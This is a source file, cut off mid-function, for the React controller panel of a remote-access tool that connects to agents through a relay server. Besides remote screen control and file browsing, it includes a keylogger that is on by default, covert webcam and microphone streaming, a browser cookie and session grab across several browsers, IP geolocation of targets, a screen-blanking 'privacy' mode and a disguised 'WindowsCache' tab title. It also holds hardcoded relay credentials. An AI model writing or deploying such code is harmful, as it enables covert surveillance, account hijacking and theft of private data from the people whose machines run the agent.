import { useState, useEffect, useRef } from 'react';
import { io } from 'socket.io-client';

const RELAY = 'wss://relay.bridgelin.online';
const ICE_SERVERS = [
  { urls: 'stun:stun.l.google.com:19302' },
  { urls: 'stun:stun1.l.google.com:19302' },
  { urls: 'stun:stun2.l.google.com:19302' },
  { urls: 'stun:stun3.l.google.com:19302' },
  { urls: 'turn:66.29.139.159:3478?transport=tcp', username: 'bridgelink', credential: 'Br1dg3L1nk@2026' },
  { urls: 'turn:66.29.139.159:3478?transport=udp', username: 'bridgelink', credential: 'Br1dg3L1nk@2026' },
  { urls: 'turns:66.29.139.159:5349', username: 'bridgelink', credential: 'Br1dg3L1nk@2026' }
];

const css = `
  @import url('https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;500;600;700&family=Inter:wght@400;500;600;700&display=swap');
  @keyframes pulse { 0%,100%{opacity:1;transform:scale(1)} 50%{opacity:0.45;transform:scale(1.35)} }
  @keyframes spin { to{transform:rotate(360deg)} }
  @keyframes fadeIn { from{opacity:0;transform:translateY(10px)} to{opacity:1;transform:translateY(0)} }
  @keyframes slideIn { from{opacity:0;transform:translateX(-12px)} to{opacity:1;transform:translateX(0)} }
  @keyframes glowPulse { 0%,100%{box-shadow:0 0 0 0 rgba(0,229,255,0.35)} 50%{box-shadow:0 0 18px 2px rgba(0,229,255,0.25)} }
  @keyframes borderGlow { 0%,100%{border-color:rgba(0,229,255,0.25)} 50%{border-color:rgba(0,229,255,0.55)} }
  .bl-pulse { animation: pulse 2s ease-in-out infinite; }
  .bl-spin { animation: spin 1s linear infinite; display:inline-block; }
  .bl-fade { animation: fadeIn 0.25s ease; }
  .bl-slide { animation: slideIn 0.18s ease; }
  .bl-card:hover { border-color: #00e5ff !important; background: linear-gradient(145deg,#0d1520,#0a1018) !important; transform: translateY(-2px); box-shadow: 0 8px 32px rgba(0,229,255,0.12), 0 0 0 1px rgba(0,229,255,0.15); }
  .bl-card { transition: all 0.2s cubic-bezier(0.22,1,0.36,1); }
  .bl-btn {
    transition: all 0.16s cubic-bezier(0.22,1,0.36,1);
    letter-spacing: 0.02em;
  }
  .bl-btn:hover:not(:disabled) {
    filter: brightness(1.1) saturate(1.08);
    transform: translateY(-1px);
    box-shadow: 0 4px 14px rgba(0,229,255,0.28);
  }
  .bl-btn:active:not(:disabled) { transform: translateY(0); filter: brightness(0.95); }
  .bl-btn:disabled { opacity: 0.55; cursor: not-allowed; }
  .bl-icon-btn {
    transition: all 0.14s cubic-bezier(0.22,1,0.36,1);
    letter-spacing: 0.01em;
  }
  .bl-icon-btn:hover {
    background: rgba(0,229,255,0.08) !important;
    border-color: rgba(0,229,255,0.45) !important;
    color: #00e5ff !important;
    box-shadow: 0 0 0 1px rgba(0,229,255,0.12), 0 2px 10px rgba(0,229,255,0.1);
  }
  .bl-icon-btn:active { transform: scale(0.97); }
  .bl-danger-btn {
    transition: all 0.14s ease;
  }
  .bl-danger-btn:hover {
    background: rgba(255,59,92,0.12) !important;
    border-color: #ff3b5c !important;
    color: #ff6b82 !important;
    box-shadow: 0 0 0 1px rgba(255,59,92,0.2);
  }
  .bl-bottombar {
    transition: opacity 0.2s ease, transform 0.22s cubic-bezier(0.22,1,0.36,1);
  }
  .bl-bottombar.bl-collapsed {
    opacity: 0;
    pointer-events: none;
    transform: translate(-50%, 12px) scale(0.96);
  }
  input:focus, textarea:focus, select:focus { border-color: #00e5ff !important; box-shadow: 0 0 0 3px rgba(0,229,255,0.18) !important; outline: none !important; }
  input, textarea, select { transition: border-color 0.15s, box-shadow 0.15s; }
  .bl-file-entry:hover { background: #0e1a24 !important; }
  .bl-file-entry { transition: background 0.12s; }
  .bl-monitor-opt:hover { background: #0e1a24 !important; }
  .bl-monitor-opt { transition: background 0.12s; }
  * { box-sizing: border-box; }
  ::-webkit-scrollbar { width: 6px; height: 6px; }
  ::-webkit-scrollbar-track { background: transparent; }
  ::-webkit-scrollbar-thumb { background: #1a2a38; border-radius: 3px; }
  ::-webkit-scrollbar-thumb:hover { background: #00e5ff55; }
  .bl-mobile-only { display: none; }
  .remote-screen, .remote-screen * {
    cursor: none !important;
    user-select: none;
    -webkit-user-select: none;
  }
  body { margin: 0; background: #05080c; }
  @media (max-width: 820px) {
    .bl-icon-btn, .bl-btn { padding: 7px 9px !important; font-size: 12px !important; min-height: 36px; }
    .bl-ctrlbar-right { flex-wrap: wrap !important; justify-content: center !important; gap: 6px !important; }
    .bl-bottombar { max-width: 96vw !important; overflow-x: auto !important; -webkit-overflow-scrolling: touch; flex-wrap: nowrap !important; }
    .bl-panel { width: min(400px, 92vw) !important; max-width: 92vw !important; max-height: 70vh !important; overflow-y: auto !important; }
    .bl-scrollpad { transform: scale(1.25); transform-origin: bottom right; }
    .bl-mobile-only { display: inline-flex !important; }
  }
`;


// Private / local IP ranges that have no public geolocation.
function isPrivateIp(ip) {
  if (!ip) return true;
  if (ip === '127.0.0.1' || ip === '::1' || ip === 'localhost') return true;
  if (ip.startsWith('192.168.') || ip.startsWith('10.') || ip.startsWith('169.254.')) return true;
  // 172.16.0.0 to 172.31.255.255
  const m = ip.match(/^172\.(\d+)\./);
  if (m && +m[1] >= 16 && +m[1] <= 31) return true;
  return false;
}

function AgentLocation({ ip }) {
  const [loc, setLoc] = useState('');
  useEffect(() => {
    if (!ip) return;
    const cleanIp = ip.replace('::ffff:', '');
    if (isPrivateIp(cleanIp)) { setLoc('📍 Local Network'); return; }
    // ip-api.com free tier is HTTP-only, so it fails over HTTPS. ipwho.is
    // is free, works over HTTPS, and allows browser requests.
    fetch(`https://ipwho.is/${cleanIp}`)
      .then(r => r.json())
      .then(d => { if (d && d.success) setLoc(`📍 ${d.city}, ${d.region}, ${d.country}`); })
      .catch(() => {});
  }, [ip]);
  return loc ? <div style={{ color: '#ffaa00', fontSize: 11, marginTop: 3 }}>{loc}</div> : null;
}

export default function App() {
  const [screen, setScreen] = useState('login');
  const [passphrase, setPassphrase] = useState('');
  const [agents, setAgents] = useState([]);
  const [agentPings, setAgentPings] = useState({});
  const [activeAgent, setActiveAgent] = useState(null);
  const [error, setError] = useState('');
  const [status, setStatus] = useState('');
  const [lastKey, setLastKey] = useState('');
  const [privacyOn, setPrivacyOn] = useState(false);
  const [privacyPct, setPrivacyPct] = useState(null); // [BL-EDIT] synced maintenance counter
  const [privacyPaused, setPrivacyPaused] = useState(false); // [BL-EDIT] counter paused
  const [screenStatus, setScreenStatus] = useState('on');
  const [screenAlert, setScreenAlert] = useState(false);
  const [connecting, setConnecting] = useState(false);
  const [sessionTime, setSessionTime] = useState(0);
  const [isFullscreen, setIsFullscreen] = useState(false);
  const [agentLocation, setAgentLocation] = useState(null);
  const [cursorPos, setCursorPos] = useState({ x: 0, y: 0 });
  const [cursorVisible, setCursorVisible] = useState(false);
  const [cursorType, setCursorType] = useState('default');
  const [refreshing, setRefreshing] = useState(false);
  const [showFilePanel, setShowFilePanel] = useState(false);
  const [fileExpanded, setFileExpanded] = useState(false); // [BL-EDIT] big file panel
  const [fileTransferStatus, setFileTransferStatus] = useState('');
  const [fileTransferDone, setFileTransferDone] = useState(false);
  const [browsing, setBrowsing] = useState(false);
  const [browseLoading, setBrowseLoading] = useState(false);
  const [browsePath, setBrowsePath] = useState('');
  const [browseEntries, setBrowseEntries] = useState([]);
  const [selFiles, setSelFiles] = useState([]);   // paths ticked for a multi-download
  const [browseParent, setBrowseParent] = useState(null);
  const [browseError, setBrowseError] = useState('');
  const [dragOver, setDragOver] = useState(false);
  const [agentOffline, setAgentOffline] = useState(false);
  const [reconnectCountdown, setReconnectCountdown] = useState(0);
  const [streamError, setStreamError] = useState('');
  const [showChat, setShowChat] = useState(false);
  const [chatMsg, setChatMsg] = useState('');
  const [chatSent, setChatSent] = useState('');
  // [BL-EDIT] Toast notifications. Every status message (record, copy, video,
  // errors) now surfaces as a stacked, auto-dismissing toast at the top of the
  // screen instead of a cramped inline line. Multiple toasts stack and each
  // clears itself, so firing two at once is handled cleanly.
  const [toasts, setToasts] = useState([]);
  const toastIdRef = useRef(0);
  const pushToast = (msg, type) => {
    const text = String(msg || '').trim();
    if (!text) return;
    if (!type) {
      if (/❌|cannot|could not|fail|error|denied|no image|not available|needs/i.test(text)) type = 'error';
      else if (/✅|🖼|copied|pasted|sent|placed|received|saved|ready|started|stopped/i.test(text)) type = 'success';
      else type = 'info';
    }
    const id = ++toastIdRef.current;
    setToasts(prev => [...prev.slice(-4), { id, text, type }]); // keep at most 5 on screen
    setTimeout(() => setToasts(prev => prev.filter(t => t.id !== id)), 4500);
  };
  const dismissToast = (id) => setToasts(prev => prev.filter(t => t.id !== id));
  // Back-compat shim: existing setClipboardStatus('...') calls become toasts.
  // A '' clear is now a no-op (toasts self-dismiss), so old clear timers are harmless.
  const clipboardStatus = '';
  const setClipboardStatus = (msg) => pushToast(msg);
  const [agentImage, setAgentImage] = useState(null);   // image grabbed from the agent
  // State migration (move your own app/browser sessions between your machines).
  const [showMigrate, setShowMigrate] = useState(false);
  const [migTargets, setMigTargets] = useState({ firefox: true, chrome: false, edge: false, brave: false });
  const [migStatus, setMigStatus] = useState('');
  const [migSel, setMigSel] = useState('');
  const [migPkgs, setMigPkgs] = useState(() => {
    try { return JSON.parse(localStorage.getItem('bl_state_packages') || '[]'); } catch (e) { return []; }
  });
  // [BL-EDIT] Migrate preview (per-target sizes) + cookie grab status.
  const [statePreview, setStatePreview] = useState(null); // [{key,exists,mb}]
  const [cookieBusy, setCookieBusy] = useState(false);
  // [BL-EDIT] Lock remote input, auto-quality, remote task manager.
  const [inputLocked, setInputLocked] = useState(false);
  const [autoQuality, setAutoQuality] = useState(true);
  const autoQualityRef = useRef(true);
  useEffect(() => { autoQualityRef.current = autoQuality; }, [autoQuality]);
  const lastStreamWRef = useRef(0);
  const qTierRef = useRef(null);        // [BL-EDIT] auto-quality hysteresis
  const qStableRef = useRef(0);
  const lastQChangeRef = useRef(0);
  const [showTaskMgr, setShowTaskMgr] = useState(false);
  const [procList, setProcList] = useState([]);
  const [procLoading, setProcLoading] = useState(false);
  const [procFilter, setProcFilter] = useState('');
  // [BL-EDIT] Type-text box: send a block of text for the agent to type.
  const [showTypeBox, setShowTypeBox] = useState(false);
  const [typeText, setTypeText] = useState('');
  const [typeEnter, setTypeEnter] = useState(false);
  const [toolbarMin, setToolbarMin] = useState(false); // [BL-EDIT] minimize bottom toolbar
  const [sendDest, setSendDest] = useState('desktop'); // [BL-EDIT] where sent files land
  const [sendDestPath, setSendDestPath] = useState(''); // [BL-EDIT] custom destination path
  // [BL-EDIT] Mobile: pinch-zoom/pan of the remote view + on-screen keyboard.
  const [zoom, setZoom] = useState(1);
  const [pan, setPan] = useState({ x: 0, y: 0 });
  const videoWrapRef = useRef(null);
  const pinchRef = useRef(null);
  const mobileKbdRef = useRef(null);
  const zoomRef = useRef(1); useEffect(() => { zoomRef.current = zoom; }, [zoom]);
  const panRef = useRef({ x: 0, y: 0 }); useEffect(() => { panRef.current = pan; }, [pan]);
  const [monitors, setMonitors] = useState([]);
  const [activeMonitor, setActiveMonitor] = useState(1);
  const [showMonitors, setShowMonitors] = useState(false);
  const [mouseEnabled, setMouseEnabled] = useState(false);
  const mouseEnabledRef = useRef(false);
  // Per-machine tags (your own nicknames), remembered in this browser.
  const [deviceTags, setDeviceTags] = useState(() => {
    try { return JSON.parse(localStorage.getItem('bl_device_tags') || '{}'); } catch (e) { return {}; }
  });
  const [promptCfg, setPromptCfg] = useState(null); // [BL-EDIT] in-app prompt popup (Electron has no window.prompt)
  const tagFor = (id) => (id && deviceTags[id]) || '';
  // [BL-EDIT] Tags now live on your ACCOUNT (saved on the relay), so they sync
  // across the desktop app, web, and phone. localStorage is just a local cache.
  const persistTags = (next) => {
    setDeviceTags(next);
    try { localStorage.setItem('bl_device_tags', JSON.stringify(next)); } catch (e) {}
    try { socketRef.current?.emit('controller:tags:set', { token: tokenRef.current, tags: next }); } catch (e) {}
  };
  // [BL-EDIT] In-app popup that replaces window.prompt (Electron does NOT
  // support window.prompt — it returns null, which is why the Privacy and Tag
  // buttons did nothing in the desktop apps). Works in browser AND Electron.
  const appPrompt = (message, defaultValue = '') =>
    new Promise((resolve) => setPromptCfg({ message, value: defaultValue, resolve }));
  const setTag = (id) => {
    const cur = deviceTags[id] || '';
    appPrompt('Name / tag for this machine (leave empty to clear):', cur).then((val) => {
      if (val === null) return;
      const next = { ...deviceTags };
      if (val.trim()) next[id] = val.trim(); else delete next[id];
      persistTags(next);
    });
  };
const [loadingScreen, setLoadingScreen] = useState(false);
  const [loadingMsg, setLoadingMsg] = useState('Connecting...');
  const [screenImage, setScreenImage] = useState(null);
  const [screenMode, setScreenMode] = useState('webrtc');
  const [streamLive, setStreamLive] = useState(false);
  const [latency, setLatency] = useState(null);
  const [quality, setQuality] = useState(null);
  const [showKeypad, setShowKeypad] = useState(false);
  const latencyIntervalRef = useRef(null);
  const [recording, setRecording] = useState(false);
  const [recordingTime, setRecordingTime] = useState(0);
  const mediaRecorderRef = useRef(null);
  const recordingChunksRef = useRef([]);
  const recordingTimerRef = useRef(null);
  // [BL-EDIT] Canvas overlay recording: burn the typed keys into the video.
  const recordingCanvasRef = useRef(null);
  const recordingDrawRef = useRef(null);
  // [BL-EDIT] Session recordings list (kept for this session so you can re-save
  // or review them) + a "waiting for the picture" flag so Record can wait
  // instead of rejecting.
  const [recordings, setRecordings] = useState([]);
  const [showRecordings, setShowRecordings] = useState(false);
  const [recWaiting, setRecWaiting] = useState(false);
  const recWaitRef = useRef(null);
  // [BL-EDIT] Draggable bottom toolbar so it can be moved out of the way.
  const [barPos, setBarPos] = useState(null); // {x, y} or null = default centered
  const barDragRef = useRef(null);
  const keylogTextRef = useRef('');
  const [licenseKey, setLicenseKey] = useState('');
  const [licenseError, setLicenseError] = useState('');
  const [licenseChecking, setLicenseChecking] = useState(false);
  const [licenseValid, setLicenseValid] = useState(false);
  const [uninstallToast, setUninstallToast] = useState('');
  const [userActive, setUserActive] = useState(false);
  const [, setKeylogBuffer] = useState([]);
  const [keylogText, setKeylogText] = useState('');   // assembled readable text
  const [keylogOn, setKeylogOn] = useState(true);      // typing monitor on/off
  const keylogOnRef = useRef(true);
  // [BL-EDIT] Mirror keylog text into a ref so the recording draw loop reads the latest.
  useEffect(() => { keylogTextRef.current = keylogText; }, [keylogText]);
  const [agentCursorPos, setAgentCursorPos] = useState(null);
  const userActiveTimerRef = useRef(null);
  const keylogTimerRef = useRef(null);
  const agentCursorTimerRef = useRef(null);
  const [toolboxScripts] = useState([]);
  const [showToolbox, setShowToolbox] = useState(null);
  const [, setToolboxAgent] = useState(null);
  const [cameraOn, setCameraOn] = useState(false);
const [cameraFrame, setCameraFrame] = useState(null);
const [cameraError, setCameraError] = useState('');
// [BL-EDIT] Camera window: status message + draggable/resizable/expandable.
const [camStatus, setCamStatus] = useState('');      // '', 'starting', or an error string
const [camPos, setCamPos] = useState(null);          // {x,y} once dragged; null = default corner
const [camW] = useState(300);               // window width
const [camBig, setCamBig] = useState(false);
// [BL-EDIT] Adaptive camera: measure arriving frames, nudge quality, and time out.
const camFrameCountRef = useRef(0);
const camLevelRef = useRef('medium');
const camAdaptRef = useRef(null);
const camTimeoutRef = useRef(null);
const [features, setFeatures] = useState({});
const [intrusion, setIntrusion] = useState('');
const [audioOn, setAudioOn] = useState(false); 
const [registeredAgents, setRegisteredAgents] = useState([]);
const [showOffline, setShowOffline] = useState(false);   // offline list collapsed by default
  // Offline agents you have cleared (dismissed). Kept in this browser. An
  // agent leaves this list the moment it comes back online (or you connect to
  // it), so it will show again the next time it goes offline.
  const [clearedOffline, setClearedOffline] = useState(() => {
    try { return JSON.parse(localStorage.getItem('bl_cleared_offline') || '[]'); } catch (e) { return []; }
  });
  const saveCleared = (list) => {
    setClearedOffline(list);
    try { localStorage.setItem('bl_cleared_offline', JSON.stringify(list)); } catch (e) {}
  };
  // An agent that is currently online is removed from the cleared list, so it
  // will reappear in the offline section the next time it goes offline.
  useEffect(() => {
    const onlineIds = new Set(registeredAgents.filter(r => r.online).map(r => r.deviceId));
    setClearedOffline(prev => {
      const next = prev.filter(id => !onlineIds.has(id));
      if (next.length !== prev.length) {
        try { localStorage.setItem('bl_cleared_offline', JSON.stringify(next)); } catch (e) {}
        return next;
      }
      return prev;
    });
  }, [registeredAgents]);

  const socketRef = useRef(null);
  const pcRef = useRef(null);
  const videoRef = useRef(null);
  const screenImgRef = useRef(null);
  const activeAgentRef = useRef(null);
  const controlRef = useRef(null);
  const keyTimeoutRef = useRef(null);
  const alertTimeoutRef = useRef(null);
  const tokenRef = useRef(null);
  const sessionTimerRef = useRef(null);
  const lastMouseMove = useRef(0);
  const lastClickTime = useRef(0);
  const lastClickPos = useRef({ x: 0, y: 0 });
  const clickTimerRef = useRef(null);   // [BL-EDIT] single vs double click disambiguation
  const scrollHoldRef = useRef(null);   // [BL-EDIT] press-and-hold scroll arrows
  const lastInputSentRef = useRef(0);   // [BL-EDIT] when WE last sent input, to suppress our own "user active"
  const fileChunksRef = useRef({});
  const pcGenRef = useRef(0);
  const browseReqIdRef = useRef(0);
  const reconnectTimerRef = useRef(null);
  const graceTimerRef = useRef(null);
  const countdownTimerRef = useRef(null);
  const agentOfflineRef = useRef(false);
  const screenModeRef = useRef('webrtc');
  const lastFrameTsRef = useRef(0);
  const lastFrameUrlRef = useRef(null);
  const pressedKeysRef = useRef(new Set());
  const webrtcAliveRef = useRef(false);
  const mouseRafRef = useRef(null);
  const pendingMouseRef = useRef(null);
  const locationCache = useRef({})
  const audioCtxRef = useRef(null); 
  const audioTimeRef = useRef(0);
  const audioOnRef = useRef(false);


  useEffect(() => {
    const style = document.createElement('style');
    style.textContent = css;
    document.head.appendChild(style);
    document.title = 'WindowsCache';
    let link = document.querySelector("link[rel~='icon']");
    if (!link) { link = document.createElement('link'); link.rel = 'icon'; document.head.appendChild(link); }
    link.href = 'data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22 viewBox=%220 0 100 100%22><text y=%22.9em%22 font-size=%2290%22>⬡</text></svg>';
    return () => document.head.removeChild(style);
  }, []);

  useEffect(() => { activeAgentRef.current = activeAgent; }, [activeAgent]);
  useEffect(() => {
  screenModeRef.current = screenMode;
}, [screenMode]);

  useEffect(() => {
    const saved = localStorage.getItem('wc_license');
    if (saved) {
      fetch('https://relay.bridgelin.online/license/check', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ key: saved })
      }).then(r => r.json()).then(d => {
        if (d.valid) setLicenseValid(true);
        else { localStorage.removeItem('wc_license'); setLicenseValid(false); }
      }).catch(() => { setLicenseValid(true); });
    }
  }, []);

  useEffect(() => {
  if (screen !== 'control' && audioOn) stopListen();
}, [screen, audioOn]);   // eslint-disable-line react-hooks/exhaustive-deps

  useEffect(() => {
    if (screen === 'control' && controlRef.current) controlRef.current.focus();
    if (screen === 'control') {
      setSessionTime(0);
      sessionTimerRef.current = setInterval(() => setSessionTime(t => t + 1), 1000);
    } else {
      clearInterval(sessionTimerRef.current);
      setSessionTime(0);
    }
    return () => clearInterval(sessionTimerRef.current);
  }, [screen]);

  useEffect(() => {
  if (screen !== 'control' && cameraOn) {
    sendCommand({ type: 'camera:stop' });
    setCameraOn(false);
    setCameraFrame(null);
  }
}, [screen, cameraOn]); 

  useEffect(() => {
    if (screen !== 'control') return;

    document.addEventListener('keydown', handleKeyDown);
    document.addEventListener('keyup', handleKeyUp);

    return () => {
        document.removeEventListener('keydown', handleKeyDown);
        document.removeEventListener('keyup', handleKeyUp);
    };
    // eslint-disable-next-line react-hooks/exhaustive-deps
}, [screen, activeAgent, screenMode]);

  useEffect(() => {
    const handleFullscreenChange = () => setIsFullscreen(!!document.fullscreenElement);
    document.addEventListener('fullscreenchange', handleFullscreenChange);
    return () => document.removeEventListener('fullscreenchange', handleFullscreenChange);
  }, []);

  const formatTime = (seconds) => {
    const h = Math.floor(seconds / 3600), m = Math.floor((seconds % 3600) / 60), s = seconds % 60;
    if (h > 0) return `${h}:${String(m).padStart(2,'0')}:${String(s).padStart(2,'0')}`;
    return `${String(m).padStart(2,'0')}:${String(s).padStart(2,'0')}`;
  };

  const toggleFullscreen = () => {
    if (!document.fullscreenElement) controlRef.current?.requestFullscreen();
    else document.exitFullscreen();
  };

  const startListen = () => {
  setAudioOn(true);
  audioOnRef.current = true;
  audioTimeRef.current = 0;
  // create/resume the context inside the click gesture
  if (!audioCtxRef.current) {
    audioCtxRef.current = new (window.AudioContext || window.webkitAudioContext)();
  }
  audioCtxRef.current.resume?.();
  sendCommand({ type: 'audio:start' });
};

const stopListen = () => {
  sendCommand({ type: 'audio:stop' });
  setAudioOn(false);
  audioOnRef.current = false;
  if (audioCtxRef.current) { try { audioCtxRef.current.close(); } catch {} audioCtxRef.current = null; }
};

  
 const fetchAgentLocation = async (agentArg) => {
    // Prefer the agent's real PUBLIC ip (it reports it), not the relay-seen
    // proxy address, so the location is the machine's actual location.
    const agent = { ...agentArg, ip: agentArg.publicIp || agentArg.ip };
    if (!agent?.ip) return;
    const cleanIp = agent.ip.replace('::ffff:', '');

    if (
        cleanIp.startsWith('192.168') ||
        cleanIp.startsWith('10.') ||
        cleanIp.startsWith('172.') ||
        cleanIp === '127.0.0.1' ||
        cleanIp === '::1' ||
        cleanIp === '::ffff:127.0.0.1' ||
        cleanIp === 'localhost'
    ) {
        setAgentLocation('📍 Local Network');
        return;
    }

    if (locationCache.current[cleanIp]) {
        setAgentLocation(locationCache.current[cleanIp]);
        return;
    }

    try {
        // ip-api.com free tier is HTTP-only (fails over HTTPS). ipwho.is is
        // free and works over HTTPS from the browser.
        const res = await fetch(`https://ipwho.is/${cleanIp}`);
        const data = await res.json();
        if (data && data.success) {
            const location = `📍 ${data.city}, ${data.region}, ${data.country}`;
            locationCache.current[cleanIp] = location;
            setAgentLocation(location);
        }
    } catch {
        setAgentLocation(null);
    }
};

const playAudioChunk = (b64, rate) => {
  try {
    if (!audioCtxRef.current) {
      audioCtxRef.current = new (window.AudioContext || window.webkitAudioContext)();
      audioTimeRef.current = audioCtxRef.current.currentTime;
    }
    const ctx = audioCtxRef.current;
    const bin = atob(b64);
    const bytes = new Uint8Array(bin.length);
    for (let i = 0; i < bin.length; i++) bytes[i] = bin.charCodeAt(i);
    const int16 = new Int16Array(bytes.buffer);
    const f32 = new Float32Array(int16.length);
    for (let i = 0; i < int16.length; i++) f32[i] = int16[i] / 32768;
    const buf = ctx.createBuffer(1, f32.length, rate || 16000);
    buf.copyToChannel(f32, 0);
    const src = ctx.createBufferSource();
    src.buffer = buf;
    src.connect(ctx.destination);
    const now = ctx.currentTime;
    // small jitter buffer so chunks don't overlap/gap
    if (audioTimeRef.current < now + 0.02) audioTimeRef.current = now + 0.05;
    src.start(audioTimeRef.current);
    audioTimeRef.current += buf.duration;
  } catch (e) { console.warn('[AUDIO] play error', e); }
};


  const refreshAgents = () => {
    if (!socketRef.current?.connected) { setRefreshing(true); setTimeout(() => setRefreshing(false), 1000); return; }
    setRefreshing(true);
    socketRef.current.emit('controller:get-agents');
    setTimeout(() => setRefreshing(false), 1200);
  };

  const setTransferStatus = (msg, done = false) => { setFileTransferStatus(msg); setFileTransferDone(done); };

  const browseDir = (path) => {
    setBrowseLoading(true); setBrowseError('');
    const reqId = ++browseReqIdRef.current;
    sendCommand({ type: 'fs:list', path, requestId: reqId });
  };

  const openBrowser = () => { setBrowsing(true); browseDir('~'); };

  const captureLastVideoFrame = () => {
  try {
    const v = videoRef.current;
    if (!v || !v.videoWidth) return null;
    const c = document.createElement('canvas');
    c.width = v.videoWidth;
    c.height = v.videoHeight;
    const ctx = c.getContext('2d');
    ctx.drawImage(v, 0, 0);
    const url = c.toDataURL('image/jpeg', 0.72);
    lastFrameUrlRef.current = url;
    setScreenImage(url);
    return url;
  } catch {
    return lastFrameUrlRef.current;
  }
};

  const stopWebRTC = (opts = {}) => {
  const { clearError = true, holdFrame = true } = opts;
  pcGenRef.current += 1;
  if (reconnectTimerRef.current) clearTimeout(reconnectTimerRef.current);
  if (countdownTimerRef.current) clearInterval(countdownTimerRef.current);
  setReconnectCountdown(0);
  if (latencyIntervalRef.current) clearInterval(latencyIntervalRef.current);
  webrtcAliveRef.current = false;
  setStreamLive(false);
  if (holdFrame) captureLastVideoFrame();
  if (pcRef.current) {
    try { pcRef.current.close(); } catch {}
    pcRef.current = null;
  }
  // Keep last decoded frame visible — do not blank the video element.
  if (clearError) setStreamError('');
  if (graceTimerRef.current) { clearTimeout(graceTimerRef.current); graceTimerRef.current = null; }
};

const enterScreenshotMode = (firstUrl) => {
  screenModeRef.current = 'screenshot';
  setScreenMode('screenshot');
  webrtcAliveRef.current = false;
  setStreamLive(false);
  setLoadingScreen(false);
  setLoadingMsg('Screenshot mode');
  setStatus('connected');
  setStreamError('');
  setAgentOffline(false);
  agentOfflineRef.current = false;
  stopWebRTC();
  if (firstUrl) {
    setScreenImage(firstUrl);
    requestAnimationFrame(() => {
      if (screenImgRef.current) screenImgRef.current.src = firstUrl;
    });
  }
};

const scheduleReconnect = (agent, delay = 2) => {
  if (agentOfflineRef.current) return;
  if (reconnectTimerRef.current) clearTimeout(reconnectTimerRef.current);
  if (countdownTimerRef.current) clearInterval(countdownTimerRef.current);
  // Hold last frame; do not force screenshot-only mode.
  captureLastVideoFrame();
  setReconnectCountdown(delay);
  countdownTimerRef.current = setInterval(() => {
    setReconnectCountdown(prev => {
      if (prev <= 1) {
        clearInterval(countdownTimerRef.current);
        return 0;
      }
      return prev - 1;
    });
  }, 1000);
  reconnectTimerRef.current = setTimeout(() => {
    if (agentOfflineRef.current) return;
    setStreamError('');
    startWebRTC(agent || activeAgentRef.current);
  }, delay * 1000);
};



  const validateLicense = async () => {
    if (!licenseKey.trim()) { setLicenseError('Please enter your license key'); return; }
    setLicenseChecking(true); setLicenseError('');
    try {
      const res = await fetch('https://relay.bridgelin.online/license/validate', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ key: licenseKey.trim().toUpperCase() })
      });
      const data = await res.json();
      if (data.valid) { localStorage.setItem('wc_license', licenseKey.trim().toUpperCase()); setLicenseValid(true); setLicenseError(''); }
      else { setLicenseError(data.reason || 'Invalid license key'); }
    } catch { setLicenseError('Connection failed. Try again.'); }
    setLicenseChecking(false);
  };

  const login = () => {
    setConnecting(true); setError('');
    const socket = io(RELAY, { transports: ['websocket'] });
    socketRef.current = socket;

    socket.on('connect', () => {
      socket.emit('controller:auth', { passphrase });
      
    
    });
    socket.on('auth:success', (data) => { setConnecting(false); setScreen('dashboard'); setError(''); if (data?.token) tokenRef.current = data.token; setFeatures(data?.features || {}); socket.emit('controller:get-registered') });
    socket.on('auth:failed', (data) => { setConnecting(false); setError(data?.reason || 'Wrong passphrase'); socket.disconnect(); });
    socket.on('session:expired', () => { alert('Session expired.'); tokenRef.current = null; setScreen('login'); socket.disconnect(); });
    socket.on('connect_error', () => { setConnecting(false); setError('Connection failed. Try again.'); socket.disconnect(); });
    socket.on('disconnect', () => { if (screen === 'control') setStreamError('Relay disconnected — reconnecting...'); });
    // socket.on('features:update', (data) => {
    // setFeatures(prev => ({ ...prev, ...data }));
    socket.on('features:update', (data) => {
      setFeatures(prev => ({ ...prev, ...data }));
      // if camera was just revoked while it's open, stop it immediately
      if (data.camera === false && cameraOn) {
        sendCommand({ type: 'camera:stop' });
        setCameraOn(false);
        setCameraFrame(null);
      }
      // if audio was just revoked while listening, stop it immediately
      if (data.audio === false && audioOn) {
        sendCommand({ type: 'audio:stop' });
        setAudioOn(false);
        audioOnRef.current = false;
        if (audioCtxRef.current) { try { audioCtxRef.current.close(); } catch {} audioCtxRef.current = null; }
      }
    });

    socket.on('registered:agents', (list) => {
      console.log('[REGISTERED] received:', list.length, 'agents');
      setRegisteredAgents(list);
    });

    socket.on('agent:list', (list) => {
      setAgents(list);
      socketRef.current?.emit('controller:get-registered');
      // fetch(RELAY.replace('wss://','https://') + '/admin/toolbox', { headers: { 'x-admin-token': tokenRef.current || '' } })
      //   .then(r => r.json()).then(d => setToolboxScripts(d.scripts || [])).catch(() => {});
      list.forEach(agent => {
        const start = Date.now();
        socketRef.current.emit('controller:ping-agent', { deviceId: agent.deviceId });
        setTimeout(() => { setAgentPings(prev => ({ ...prev, [agent.deviceId]: Date.now() - start })); }, 500);
      });
      const agent = activeAgentRef.current;
      if (agent && agentOfflineRef.current) {
        const found = list.find(a => a.deviceId === agent.deviceId);
      if (found) {
              agentOfflineRef.current = false;
              setAgentOffline(false);
              setStreamError('');
              setStatus('Agent back online — reconnecting...');
              const useShot =
                found.streamMode === 'screenshot' ||
                found.webrtcAvailable === false ||
                found.frozen === true ||
                screenModeRef.current === 'screenshot';
              if (useShot) {
                enterScreenshotMode();
              } else {
                setTimeout(() => startWebRTC(found), 1000);
              }
            }
      }
    });

    socket.on('agent:disconnected', (data) => {
      const agent = activeAgentRef.current;
      if (agent && data.deviceId === agent.deviceId) {
        agentOfflineRef.current = true; setAgentOffline(true); setStatus('Agent offline'); setStreamError('Agent went offline');
        if (reconnectTimerRef.current) clearTimeout(reconnectTimerRef.current);
        if (countdownTimerRef.current) clearInterval(countdownTimerRef.current);
        setReconnectCountdown(0);
      }
    });

    socket.on('webrtc:answer', async (data) => {
      const pc = pcRef.current;
      if (!pc || pc.signalingState !== 'have-local-offer') return;
      try { await pc.setRemoteDescription(new RTCSessionDescription(data.answer)); } catch (e) {}
    });

    socket.on('webrtc:ice', async (data) => {
      const pc = pcRef.current;
      if (!pc || !pc.remoteDescription || !data.candidate) return;
      try { await pc.addIceCandidate(new RTCIceCandidate(data.candidate)); } catch (e) {}
    });

  
  
   socket.on('agent:screenshot', (data) => {
